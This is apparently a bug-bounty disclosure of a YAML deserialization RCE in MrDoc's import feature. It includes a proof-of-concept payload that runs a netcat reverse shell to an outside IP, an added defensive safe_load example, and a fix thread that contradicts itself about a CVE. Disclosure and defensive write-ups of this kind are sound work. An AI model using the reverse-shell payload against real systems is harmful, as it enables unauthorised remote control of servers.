Deserialization of Untrusted Data in zmister2016/mrdoc

Valid

Reported on

Aug 29th 2021


✍️ Description

MrDoc is an online document system developed in Python. It is suitable for individuals and small teams to manage documents, wikis, knowledge bases and notes, like GitBook. This package is vulnerable to RCE due to yaml.load in the import function.

πŸ•΅οΈβ€β™‚οΈ Proof of Concept

Uploaded ZIP:

Payload.yaml:

!!python/object/new:type
 args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"

💥 Impact

This vulnerability is capable of RCE.
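The report's root cause is an import routine that hands an uploaded YAML file to yaml.load, whose default (unsafe) loader resolves PyYAML's !!python/ tags into live Python objects. The following added example, which is not part of the report or of mrdoc's own code, shows the defensive counterpart: a pre-parse screen that flags Python-specific tags in an upload, followed by parsing with yaml.safe_load, which builds only plain dicts, lists and scalars and refuses such tags on its own. The function names, the constructed sample documents (the malicious one keeps the shape of the report's payload with the shell command replaced by a harmless placeholder) and the presence of PyYAML are assumptions of the example.

```python
import re
from typing import List, Optional, Tuple

try:
    import yaml  # PyYAML, the parser behind yaml.load / yaml.safe_load
except ImportError:
    yaml = None  # the pre-parse screen below still works without it

# PyYAML-specific tags such as !!python/name:exec or !!python/object/new:type.
# SafeLoader has no constructors for these, so safe_load refuses them; matching
# them up front additionally gives an explicit log line for the rejected upload.
PYTHON_TAG_RE = re.compile(r"!!python/[\w/.:]+")

# Constructed sample in the shape of the report's payload, with the shell
# command replaced by a harmless placeholder string.
MALICIOUS_IMPORT = """\
!!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "print('placeholder')"
"""

# Constructed sample of the kind of document an import should accept.
BENIGN_IMPORT = """\
title: Example page
tags: [wiki, notes]
children:
  - title: Child page
"""


def find_python_tags(text: str) -> List[str]:
    """Return the distinct Python-specific tags present in a YAML document."""
    return sorted(set(PYTHON_TAG_RE.findall(text)))


def load_import(text: str) -> Tuple[Optional[object], str]:
    """Parse an uploaded YAML import the safe way.

    Returns (document, verdict). Documents carrying Python-specific tags are
    rejected before parsing; everything else goes through yaml.safe_load,
    which never instantiates arbitrary objects.
    """
    tags = find_python_tags(text)
    if tags:
        return None, "rejected: python-specific tags " + ", ".join(tags)
    if yaml is None:
        return None, "unavailable: PyYAML is not installed"
    try:
        return yaml.safe_load(text), "accepted"
    except yaml.YAMLError as exc:  # ConstructorError, ParserError, ...
        return None, "rejected: " + type(exc).__name__


def safe_loader_refuses(text: str) -> Optional[bool]:
    """Show that yaml.safe_load alone rejects the tagged document, no pre-screen.

    Returns True when safe_load raises, False when it parses, None if PyYAML
    is unavailable in this environment.
    """
    if yaml is None:
        return None
    try:
        yaml.safe_load(text)
    except yaml.YAMLError:
        return True
    return False


if __name__ == "__main__":
    for label, doc in (("malicious", MALICIOUS_IMPORT), ("benign", BENIGN_IMPORT)):
        parsed, verdict = load_import(doc)
        print(f"{label}: {verdict}; parsed={parsed!r}")
    print("safe_load alone refuses the tagged file:", safe_loader_refuses(MALICIOUS_IMPORT))
```

The tag screen is a detection aid, not the fix: the fix is never calling yaml.load on user input without an explicit safe loader, since the tagged document is rejected by safe_load whether or not the screen runs first.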

Abdul muhaimin submitted a
2 years ago
Abdul muhaimin (Researcher), 2 years ago:

added a fix!

zmister2016 validated this vulnerability 2 years ago
Abdul muhaimin has been awarded the disclosure bounty
The fix bounty is now up for grabs
zmister2016 marked this as fixed with commit bb49e1 2 years ago
Abdul muhaimin has been awarded the fix bounty
This vulnerability will not receive a CVE
Jamie Slome (Admin), 2 years ago:

CVE published! 🎉

Abdul muhaimin (Researcher), 2 years ago:

Cool 💯
